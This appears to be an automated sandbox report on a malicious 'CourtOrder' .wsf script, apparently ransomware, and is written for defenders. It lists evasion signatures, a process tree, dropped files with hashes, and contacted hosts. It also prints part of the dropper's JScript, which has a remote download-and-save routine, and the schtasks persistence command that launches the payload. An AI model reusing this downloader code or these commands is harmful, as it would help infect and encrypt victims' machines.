Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe	Code function: String function: 00406EA0 appears 60 times
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe	Code function: String function: 00440BB0 appears 172 times
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe	Code function: String function: 004048A4 appears 48 times
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe	Code function: String function: 00448F80 appears 34 times
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe	Code function: String function: 00430AD0 appears 31 times
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe	Code function: String function: 00413950 appears 212 times
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe	Code function: String function: 004333A0 appears 119 times
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe	Code function: String function: 00433B10 appears 46 times

Reads the hosts file

Show sources

Source: C:\Windows\System32\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts

Java / VBScript file with very long strings (likely obfuscated code)

Show sources

Source: CourtOrder_845493809.wsf

Initial sample: Strings found which are bigger than 50

Potential malicious VBS script found (suspicious strings)

Show sources

Source:	Initial file: function busy_sleep(e){for(passed=0;passed++!=e;)for(var t=(makeid(),makeid(),(new Date).getTime()+1e3);(new Date).getTime()<t;);}function unzip(e,t){var i,o,r=new ActiveXObject("Scripting.FileSystemObject"),n=new ActiveXObject("Shell.Application");t\|\|(t="."),r.FolderExists(t)\|\|r.CreateFolder(t),i=n.NameSpace(r.getFolder(t).Path),o=n.NameSpace(r.getFile(e).Path),r.FileExists(e)&&i.CopyHere(o.Items(),20)}function download(e,t){var i=new ActiveXObject("MSXML2.ServerXMLHTTP");i.open("GET",e,!1),i.setRequestHeader("User-Agent","curl/7.51.0"),i.setOption(2,13056);var o=6e4,r=6e4,n=6e4,s=6e4;if(i.setTimeouts(o,r,n,s),i.send(),200==i.status){var a=new ActiveXObject("Scripting.FileSystemObject");a.FileExists(t)&&a.DeleteFile(t);var c=new ActiveXObject("ADODB.Stream");return c.Open(),c.Type=1,c.Write(i.responseBody),c.Position=0,c.SaveToFile(t),c.Close(),0}return i.status}function makeid(){for(var e="",t="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789",i=0;8>i;i++)e+=t.charAt(Math.floor(Math.random()*t.
Source:	Initial file: function busy_sleep(e){for(passed=0;passed++!=e;)for(var t=(makeid(),makeid(),(new Date).getTime()+1e3);(new Date).getTime()<t;);}function unzip(e,t){var i,o,r=new ActiveXObject("Scripting.FileSystemObject"),n=new ActiveXObject("Shell.Application");t\|\|(t="."),r.FolderExists(t)\|\|r.CreateFolder(t),i=n.NameSpace(r.getFolder(t).Path),o=n.NameSpace(r.getFile(e).Path),r.FileExists(e)&&i.CopyHere(o.Items(),20)}function download(e,t){var i=new ActiveXObject("MSXML2.ServerXMLHTTP");i.open("GET",e,!1),i.setRequestHeader("User-Agent","curl/7.51.0"),i.setOption(2,13056);var o=6e4,r=6e4,n=6e4,s=6e4;if(i.setTimeouts(o,r,n,s),i.send(),200==i.status){var a=new ActiveXObject("Scripting.FileSystemObject");a.FileExists(t)&&a.DeleteFile(t);var c=new ActiveXObject("ADODB.Stream");return c.Open(),c.Type=1,c.Write(i.responseBody),c.Position=0,c.SaveToFile(t),c.Close(),0}return i.status}function makeid(){for(var e="",t="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789",i=0;8>i;i++)e+=t.charAt(Math.floor(Math.random()*t.
Source:	Initial file: function busy_sleep(e){for(passed=0;passed++!=e;)for(var t=(makeid(),makeid(),(new Date).getTime()+1e3);(new Date).getTime()<t;);}function unzip(e,t){var i,o,r=new ActiveXObject("Scripting.FileSystemObject"),n=new ActiveXObject("Shell.Application");t\|\|(t="."),r.FolderExists(t)\|\|r.CreateFolder(t),i=n.NameSpace(r.getFolder(t).Path),o=n.NameSpace(r.getFile(e).Path),r.FileExists(e)&&i.CopyHere(o.Items(),20)}function download(e,t){var i=new ActiveXObject("MSXML2.ServerXMLHTTP");i.open("GET",e,!1),i.setRequestHeader("User-Agent","curl/7.51.0"),i.setOption(2,13056);var o=6e4,r=6e4,n=6e4,s=6e4;if(i.setTimeouts(o,r,n,s),i.send(),200==i.status){var a=new ActiveXObject("Scripting.FileSystemObject");a.FileExists(t)&&a.DeleteFile(t);var c=new ActiveXObject("ADODB.Stream");return c.Open(),c.Type=1,c.Write(i.responseBody),c.Position=0,c.SaveToFile(t),c.Close(),0}return i.status}function makeid(){for(var e="",t="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789",i=0;8>i;i++)e+=t.charAt(Math.floor(Math.random()*t.

HIPS / PFW / Operating System Protection Evasion:

May try to detect the Windows Explorer process (often used for injection)

Show sources

Source: sync.exe, cmd.exe	Binary or memory string: Progman
Source: sync.exe, cmd.exe	Binary or memory string: Program Manager
Source: sync.exe, cmd.exe	Binary or memory string: Shell_TrayWnd

Benign windows process drops PE files

Show sources

Source: C:\Windows\System32\wscript.exe

File created: sync.exe.0.dr

Anti Debugging:

Contains functionality to register its own exception handler

Show sources

Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe	Code function: 5_2_00401170 Sleep,Sleep,SetUnhandledExceptionFilter,_acmdln,malloc,strlen,malloc,memcpy,__initenv,_cexit,_amsg_exit,_initterm,GetStartupInfoA,_initterm,exit,		5_2_00401170
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe	Code function: 5_1_00401170 Sleep,Sleep,SetUnhandledExceptionFilter,_acmdln,malloc,strlen,malloc,memcpy,__initenv,_cexit,_amsg_exit,_initterm,GetStartupInfoA,_initterm,exit,		5_1_00401170

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

Show sources

Source: C:\Windows\System32\wscript.exe

System information queried: KernelDebuggerInformation

Contains functionality for execution timing, often used to detect debuggers

Show sources

Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe

Code function: 5_2_00415857 rdtsc

5_2_00415857

Contains functionality to dynamically determine API calls

Show sources

Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe

Code function: 5_2_00401500 GetModuleHandleA,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,

5_2_00401500

Malware Analysis System Evasion:

Contains functionality to query local drives

Show sources

Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe

5_2_00401630

Checks the free space of harddrives

Show sources

Source: C:\Windows\System32\wscript.exe

File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation

Contains functionality for execution timing, often used to detect debuggers

Show sources

Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe

Code function: 5_2_00415857 rdtsc

5_2_00415857

Contains long sleeps (>= 3 min)

Show sources

Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe	Thread delayed: delay time: 3000
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe	Thread delayed: delay time: 1000

Found WSH timer for Javascript or VBS script (likely evasive script)

Show sources

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Found large amount of non-executed APIs

Show sources

Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe

API coverage: 3.1 %

May sleep (evasive loops) to hinder dynamic analysis

Show sources

Source: C:\Windows\System32\wscript.exe TID: 3152	Thread sleep time: -240000s >= -60s
Source: C:\Windows\System32\wscript.exe TID: 3152	Thread sleep time: -60000s >= -60s
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe TID: 3360	Thread sleep time: -3000s >= -60s
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe TID: 3360	Thread sleep time: -1000s >= -60s

Accesses Audio hardware information via COM

Show sources

Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}

Hooking and other Techniques for Hiding and Protection:

Disables application error messsages (SetErrorMode)

Show sources

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX

Extensive use of GetProcAddress (often used to hide API calls)

Show sources

Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe

Code function: 5_2_004356C7 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTickCount,GetTickCount,GetTickCount,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetVersion,GetVersion,FreeLibrary,

5_2_004356C7

Stores large binary data to the registry

Show sources

Source: C:\Windows\System32\wscript.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\System32\wscript.exe	Network Connect: 104.24.116.148 80
Source: C:\Windows\System32\wscript.exe	Network Connect: 104.27.127.62 187

Language, Device and Operating System Detection:

Contains functionality to query local / system time

Show sources

Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe

Code function: 5_2_004D1780 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

5_2_004D1780

Contains functionality to query windows version

Show sources

Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe

Code function: 5_2_00413770 GetStdHandle,GetFileType,_vsnprintf,GetVersion,RegisterEventSourceA,ReportEventA,DeregisterEventSource,MessageBoxA,_vsnprintf,WriteFile,

5_2_00413770

Queries the cryptographic machine GUID

Show sources

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Contains functionality to query CPU information (cpuid)

Show sources

Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe

Code function: 5_2_004156B0 cpuid

5_2_004156B0

Queries the volume information (name, serial number etc) of a device

Show sources

Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\LUKETA~1\AppData\Local\Temp\sfbI1UOK.zip VolumeInformation
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\LUKETA~1\AppData\Local\Temp\sfbI1UOK.zip VolumeInformation
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\LUKETA~1\AppData\Local\Temp\sfbI1UOK.zip VolumeInformation
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\LUKETA~1\AppData\Local\Temp\sfbI1UOK.zip VolumeInformation
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\LUKETA~1\AppData\Local\Temp\sfbI1UOK.zip VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation

Behavior Graph

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious

Simulations

Behavior and APIs

Time	Description
11:20:02	Sleep call for process wscript.exe modified from: 60000ms to: 20000ms
11:20:05	Sleep call for process wscript.exe modified from: 60000ms to: 20000ms
11:20:05	Sleep call for process wscript.exe modified from: 60000ms to: 20000ms
11:20:05	Sleep call for process wscript.exe modified from: 60000ms to: 20000ms
11:20:05	Sleep call for process wscript.exe modified from: 60000ms to: 20000ms
11:20:05	Sleep call for process wscript.exe modified from: 60000ms to: 20000ms
11:20:05	Sleep call for process wscript.exe modified from: 60000ms to: 20000ms
11:24:00	Run new Task: sync command: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe

Antivirus Detection

Initial Sample

Source	Ratio	Cloud	Link
CourtOrder_845493809.wsf	36/58	virustotal	Browse

Dropped Files

Source	Ratio	Cloud	Link
C:\Users\LUKETA~1\AppData\Local\Temp\sfbI1UOK.jpg	18/58	virustotal	Browse

Domains

No Antivirus matches

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CloudFlareInc	MixVideoPlayer.exe	b7f643f3db49c624e51335c2ee51408291018c8a0507581a024c0a452a26efb1	malicious	Browse	104.31.93.137
	9Delivery-Details.js	ddb0955484e036672b7f92fa6576364357a568eae8609115fd741c220eb55803	malicious	Browse	198.41.214.183
	25ghrdhhahznt.exe	b9951284e71c0af5e0d9662c0dfea3db8afcb3e065cb5a3704c91eac5da74e98	malicious	Browse	104.25.38.108
	internationalprimopdf.exe	600408029d622447c7bab40a0de9c67b35037fa1c0fa69b7f24e06f8f75ef181	suspicious	Browse	104.16.4.133
	80aqulasmuts.exe	b9951284e71c0af5e0d9662c0dfea3db8afcb3e065cb5a3704c91eac5da74e98	malicious	Browse	104.25.38.108
	verschickt Artikelnummer via DHL.pdf.exe	7e4f213497690234e042903ff82932e785744fb1d17019a9dc502a53c072b107	malicious	Browse	104.16.40.2
	Magno Player.exe	2f102af1783c4b6c396fd4b8a43658ae54db6355a9bbd89b9cc05b7475d7efb1	malicious	Browse	104.31.92.137
	81xeuvrqvaews.exe	b9951284e71c0af5e0d9662c0dfea3db8afcb3e065cb5a3704c91eac5da74e98	malicious	Browse	104.25.37.108
	salesforce.com.doc	97266ce01e32cca96d55a0b5bc562f8c756d4f2147e1bb618c5769a2e227f020	malicious	Browse	104.16.38.47
	1Delivery-Details.js	c97db996f24f752f916efb7ba020c80be65bc7c364fa2b5f351cbebfd700091a	malicious	Browse	198.41.214.186
	27gmhsmxougsnk.exe	b9951284e71c0af5e0d9662c0dfea3db8afcb3e065cb5a3704c91eac5da74e98	malicious	Browse	104.25.38.108
	Quote #9907L.doc	a49705d9325ce8d87b1f24e92a3b64164ab0051eb3efbc0fc775d579959d9a62	malicious	Browse	104.27.195.88
	Quote #9907L.doc	a49705d9325ce8d87b1f24e92a3b64164ab0051eb3efbc0fc775d579959d9a62	malicious	Browse	104.27.194.88
	89MV RAYLEIGH Agency Appointment_Vessel#U9Particulars.exe	a6b1fe7f3748af3f566be9b03c8f6f26c962e9a4c351324e9d29d6e97e5a9e28	malicious	Browse	198.41.214.184
	21guarjlzihlc.exe	b9951284e71c0af5e0d9662c0dfea3db8afcb3e065cb5a3704c91eac5da74e98	malicious	Browse	104.25.38.108
CloudFlareInc	MixVideoPlayer.exe	b7f643f3db49c624e51335c2ee51408291018c8a0507581a024c0a452a26efb1	malicious	Browse	104.31.93.137
	9Delivery-Details.js	ddb0955484e036672b7f92fa6576364357a568eae8609115fd741c220eb55803	malicious	Browse	198.41.214.183
	25ghrdhhahznt.exe	b9951284e71c0af5e0d9662c0dfea3db8afcb3e065cb5a3704c91eac5da74e98	malicious	Browse	104.25.38.108
	internationalprimopdf.exe	600408029d622447c7bab40a0de9c67b35037fa1c0fa69b7f24e06f8f75ef181	suspicious	Browse	104.16.4.133
	80aqulasmuts.exe	b9951284e71c0af5e0d9662c0dfea3db8afcb3e065cb5a3704c91eac5da74e98	malicious	Browse	104.25.38.108
	verschickt Artikelnummer via DHL.pdf.exe	7e4f213497690234e042903ff82932e785744fb1d17019a9dc502a53c072b107	malicious	Browse	104.16.40.2
	Magno Player.exe	2f102af1783c4b6c396fd4b8a43658ae54db6355a9bbd89b9cc05b7475d7efb1	malicious	Browse	104.31.92.137
	81xeuvrqvaews.exe	b9951284e71c0af5e0d9662c0dfea3db8afcb3e065cb5a3704c91eac5da74e98	malicious	Browse	104.25.37.108
	salesforce.com.doc	97266ce01e32cca96d55a0b5bc562f8c756d4f2147e1bb618c5769a2e227f020	malicious	Browse	104.16.38.47
	1Delivery-Details.js	c97db996f24f752f916efb7ba020c80be65bc7c364fa2b5f351cbebfd700091a	malicious	Browse	198.41.214.186
	27gmhsmxougsnk.exe	b9951284e71c0af5e0d9662c0dfea3db8afcb3e065cb5a3704c91eac5da74e98	malicious	Browse	104.25.38.108
	Quote #9907L.doc	a49705d9325ce8d87b1f24e92a3b64164ab0051eb3efbc0fc775d579959d9a62	malicious	Browse	104.27.195.88
	Quote #9907L.doc	a49705d9325ce8d87b1f24e92a3b64164ab0051eb3efbc0fc775d579959d9a62	malicious	Browse	104.27.194.88
	89MV RAYLEIGH Agency Appointment_Vessel#U9Particulars.exe	a6b1fe7f3748af3f566be9b03c8f6f26c962e9a4c351324e9d29d6e97e5a9e28	malicious	Browse	198.41.214.184
	21guarjlzihlc.exe	b9951284e71c0af5e0d9662c0dfea3db8afcb3e065cb5a3704c91eac5da74e98	malicious	Browse	104.25.38.108

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
unknown	11Evaluation and Quote.jar	1c097d4143ab4d5ef840fe2d756cb26533f6cfd84c76a9ac2eac1efa212130a9	malicious	Browse
unknown	11Evaluation and Quote.jar	1c097d4143ab4d5ef840fe2d756cb26533f6cfd84c76a9ac2eac1efa212130a9	malicious	Browse

Screenshot

Startup

system is w7_1

wscript.exe (PID: 3112 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\Desktop\CourtOrder_845493809.wsf' MD5: 979D74799EA6C8B8167869A68DF5204A)

schtasks.exe (PID: 3292 cmdline: 'C:\Windows\System32\schtasks.exe' /CREATE /F /TN sync /TR 'C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe -e \'C:\Users\user\desktop\'' /sc once /st 11:24:00 MD5: 2003E9B15E1C502B146DAD2E383AC1E3)

sync.exe (PID: 3356 cmdline: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe -e 'C:\Users\user\desktop' MD5: E80C5368FA4395655BE9A4ED9A6CFCC3)

cmd.exe (PID: 3412 cmdline: C:\Windows\system32\cmd.exe /c move /y readme.html 'C:\Users\user\desktop\README\readme.html' MD5: AD7B9C14083B52BC532FBA5948342B98)

cmd.exe (PID: 3436 cmdline: C:\Windows\system32\cmd.exe /c move /y readme.png 'C:\Users\user\desktop\README\readme.png' MD5: AD7B9C14083B52BC532FBA5948342B98)

cmd.exe (PID: 3460 cmdline: C:\Windows\system32\cmd.exe /c cmd /c net view MD5: AD7B9C14083B52BC532FBA5948342B98)

cmd.exe (PID: 3512 cmdline: cmd /c net view MD5: AD7B9C14083B52BC532FBA5948342B98)

net.exe (PID: 3588 cmdline: net view MD5: B9A4DAC2192FD78CDA097BFA79F6E7B2)

cmd.exe (PID: 3624 cmdline: 'C:\Windows\System32\cmd.exe' /c dir C:\ /s /b /a-d >> WAJSFDWJWP MD5: AD7B9C14083B52BC532FBA5948342B98)

cleanup

Created / dropped Files

Download Dropped Binaries:	Dropped Binaries

C:\Users\LUKETA~1\AppData\Local\Temp\BACKUP~1\readme.html
File Type:	HTML document text
MD5:	315DA1E217262F4977DDE00FC72BE2FA
SHA1:	5FBA6261B8ED30E2F22EF611D76110C3409E714A
SHA-256:	E3B01F0E74F06FA1A9D3876C4176D458316B899BCCE34B4D86C94AB8D6CCD84C
SHA-512:	08ACCC57C656454073D87BB859A65E3242B4178FE3566BAB58349F0D36A6210BA046ED524A9F6A6BEEE7E01427F16804B6DA1BE427CDB170AE99EA66CFEF9EF2
Malicious:	true

C:\Users\LUKETA~1\AppData\Local\Temp\BACKUP~1\readme.png
File Type:	PNG image, 1034 x 1044, 8-bit/color RGBA, non-interlaced
MD5:	BD02A9D7DE98D1B5FDBDD1B7C56BDED7
SHA1:	7D87860F52A3ED2F4ADF4BFC34BFA8E0E5B1B2FC
SHA-256:	7DB3AD3B320408D80EC5823A6E17F4EFCD74F68ED6117CF0D92065C3136F1395
SHA-512:	95FAC41DFBA41BF7D22BB3ACDEB5440468B8B3D7C5A5AB0CDD28C945C721E5CF912EB4515340DE5BA62CEF612F4BCB6CF632EE591BAD6430BC875CAEF991C5F4
Malicious:	true

C:\Users\LUKETA~1\AppData\Local\Temp\BACKUP~1\sync.exe
File Type:	PE32 executable for MS Windows (GUI) Intel 80386 32-bit
MD5:	E80C5368FA4395655BE9A4ED9A6CFCC3
SHA1:	1BA6C43B814F97724443E96A66A673CA06C6792B
SHA-256:	877488D8F43548C6E3016ABD33E2D593A44D450F1910084733B3F369CBDCAE85
SHA-512:	A80576DABBD50DCA2142F341D688AC4085F4F3C1B4A704D7AE160EFFAD98482F08DCD2ACBE5238AEC99B15DBB42D02207FEAB57A78B2D1CA8D87AA047D3FD148
Malicious:	true

C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\WAJSFDWJWP
File Type:	ASCII text, with CRLF line terminators
MD5:	CD5EB8A79FAA8F91AD903FC5D47BA075
SHA1:	344F31BBBA06097D95168303252CD23B5D611547
SHA-256:	1B0A98ECC2B638C0782018EB805F72887D0B441FC2B4D9752E20717D59993390
SHA-512:	2EC9AE043D1FA29987612A61A9ED76007B7495486F40FA1A2F9DB42E21886CB939D899F51450027F1F4F247E164A8C63958E097B86CAA824E9336C7EF7A7048A
Malicious:	true

C:\Users\LUKETA~1\AppData\Local\Temp\sfbI1UOK.jpg
File Type:	JPEG image data, JFIF standard 1.01
MD5:	6C58B88F186F6DCA233A4DC37DC5BEB3
SHA1:	FACDE19E4E6DF17EE7046CAED6CB6063799C951E
SHA-256:	C6565D22146045E52110FD0A13EBA3B6B63FBF6583C444D7A5B4E3A368CC4B0D
SHA-512:	6BC13E9830FBA36F8B12791C29BA4DFB386BDD066642DABCA9B9DA2BD34FD2E6F5DB12720683F6BDA7F4F59F7DEB1D5220F6E2C1D4B92E28395F007D8DB83274
Malicious:	true
Antivirus:	Antivirus: virustotal, Ratio: 18/58, Browse

C:\Users\LUKETA~1\AppData\Local\Temp\sfbI1UOK.zip
File Type:	Zip archive data, at least v2.0 to extract
MD5:	2673C80566E4E5857E7F5EE0155B921F
SHA1:	65EBDF10CD9A02742BF9106866BDF57EEFA728A3
SHA-256:	5B0120A6D2D812C3E494C9CE814DDE9F425F16BFF08D91A7EF6F23222727C085
SHA-512:	6C4B629B8105D8C7A3E57AED25F29CE3F706C4F050BC8E3F3073058D3847F12892618436665B5FEC52A19E0A14EB8B475624226EEE8FCA6D904D5F600B3F7806
Malicious:	true

unknown
File Type:	ASCII English text, with CRLF line terminators
MD5:	768165E0ABF16BF3056836D5431A7296
SHA1:	9FB3196BE60E49BFC319EBD9E0B103954D711E34
SHA-256:	B44C505B721E93E2A596577018CC65B993CD632B9FE7620A4B3DB54031AFFF5D
SHA-512:	1250EC40BA20F39A5B9A3AAFD45C63CB6F1BF48B89ACCE1F885470C936FB48A803081943C68458BA1ADCE92D5FE79D3E45682285F56ECB29884D41974269992D
Malicious:	true

Contacted Domains/Contacted IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection
sm.uploads.im	104.24.116.148	true	true
image.ibb.co	104.27.127.62	true	true

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

IP	Country	ASN	ASN Name	Malicious
8.8.8.8	United States	15169	GoogleInc	false
192.168.1.16	unknown	unknown	unknown	false
104.24.116.148	United States	13335	CloudFlareInc	true
104.27.127.62	United States	13335	CloudFlareInc	true

Static File Info

General
File type:	ASCII C++ program text, with very long lines
TrID:	Digital Micrograph Script (4001/1) 100.00%
File name:	CourtOrder_845493809.wsf
File size:	3710
MD5:	d10c1bd17c1b84a22db0d77515b7c32e
SHA1:	84b41d79cb67ce254cfdf9be0431a6a5c40fab56
SHA256:	3049a568c1c1cd4d225f8f333bf05e4560c8f9de5f167201253fedf35142fe3e
SHA512:	e0eab7ec6cec2925fd1fd05d24dcd34124f3a6fb43cb7d19563e682bbc03931f5257f58f4701ee5cbc1789b7a38527b1a2486f322de60314ac606d944c41c4ad
File Content Preview:	// WINDOWS FORMS REPORT.// File generated using Pro Windows Forms, (c) 2008 - 2017, DEMO VERSION...<job>.<script language="JScript">..function busy_sleep(e){for(passed=0;passed++!=e;)for(var t=(makeid(),makeid(),(new Date).getTime()+1e3);(new Date).getTim

File Icon

Network Behavior

Download Network PCAP:	Network PCAP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 23, 2017 11:21:32.425781012 MESZ	61484	53	192.168.1.16	8.8.8.8
Aug 23, 2017 11:21:32.621227026 MESZ	53	61484	8.8.8.8	192.168.1.16
Aug 23, 2017 11:21:32.791610003 MESZ	54797	53	192.168.1.16	8.8.8.8
Aug 23, 2017 11:21:32.982661963 MESZ	53	54797	8.8.8.8	192.168.1.16
Aug 23, 2017 11:21:32.985013008 MESZ	49195	443	192.168.1.16	104.27.127.62
Aug 23, 2017 11:21:32.985078096 MESZ	443	49195	104.27.127.62	192.168.1.16
Aug 23, 2017 11:21:32.985517979 MESZ	49195	443	192.168.1.16	104.27.127.62
Aug 23, 2017 11:21:32.988763094 MESZ	49195	443	192.168.1.16	104.27.127.62
Aug 23, 2017 11:21:32.988806009 MESZ	443	49195	104.27.127.62	192.168.1.16
Aug 23, 2017 11:21:33.851550102 MESZ	443	49195	104.27.127.62	192.168.1.16
Aug 23, 2017 11:21:33.851573944 MESZ	443	49195	104.27.127.62	192.168.1.16
Aug 23, 2017 11:21:33.851583004 MESZ	443	49195	104.27.127.62	192.168.1.16
Aug 23, 2017 11:21:33.851788998 MESZ	49195	443	192.168.1.16	104.27.127.62
Aug 23, 2017 11:21:33.852735043 MESZ	49195	443	192.168.1.16	104.27.127.62
Aug 23, 2017 11:21:33.852763891 MESZ	443	49195	104.27.127.62	192.168.1.16
Aug 23, 2017 11:21:33.853559017 MESZ	443	49195	104.27.127.62	192.168.1.16
Aug 23, 2017 11:21:34.056458950 MESZ	443	49195	104.27.127.62	192.168.1.16
Aug 23, 2017 11:21:34.056596994 MESZ	49195	443	192.168.1.16	104.27.127.62
Aug 23, 2017 11:21:34.162404060 MESZ	49195	443	192.168.1.16	104.27.127.62
Aug 23, 2017 11:21:34.200450897 MESZ	443	49195	104.27.127.62	192.168.1.16
Aug 23, 2017 11:21:34.661911011 MESZ	443	49195	104.27.127.62	192.168.1.16
Aug 23, 2017 11:21:34.662143946 MESZ	443	49195	104.27.127.62	192.168.1.16
Aug 23, 2017 11:21:34.662206888 MESZ	443	49195	104.27.127.62	192.168.1.16
Aug 23, 2017 11:21:34.662220001 MESZ	49195	443	192.168.1.16	104.27.127.62
Aug 23, 2017 11:21:34.662250996 MESZ	443	49195	104.27.127.62	192.168.1.16
Aug 23, 2017 11:21:34.662626982 MESZ	49195	443	192.168.1.16	104.27.127.62
Aug 23, 2017 11:21:34.691603899 MESZ	443	49195	104.27.127.62	192.168.1.16
Aug 23, 2017 11:21:34.691715956 MESZ	443	49195	104.27.127.62	192.168.1.16
Aug 23, 2017 11:21:34.691876888 MESZ	49195	443	192.168.1.16	104.27.127.62
Aug 23, 2017 11:21:34.691909075 MESZ	443	49195	104.27.127.62	192.168.1.16
Aug 23, 2017 11:21:34.711714029 MESZ	49195	443	192.168.1.16	104.27.127.62
Aug 23, 2017 11:21:34.711771965 MESZ	443	49195	104.27.127.62	192.168.1.16
Aug 23, 2017 11:21:34.711913109 MESZ	49195	443	192.168.1.16	104.27.127.62
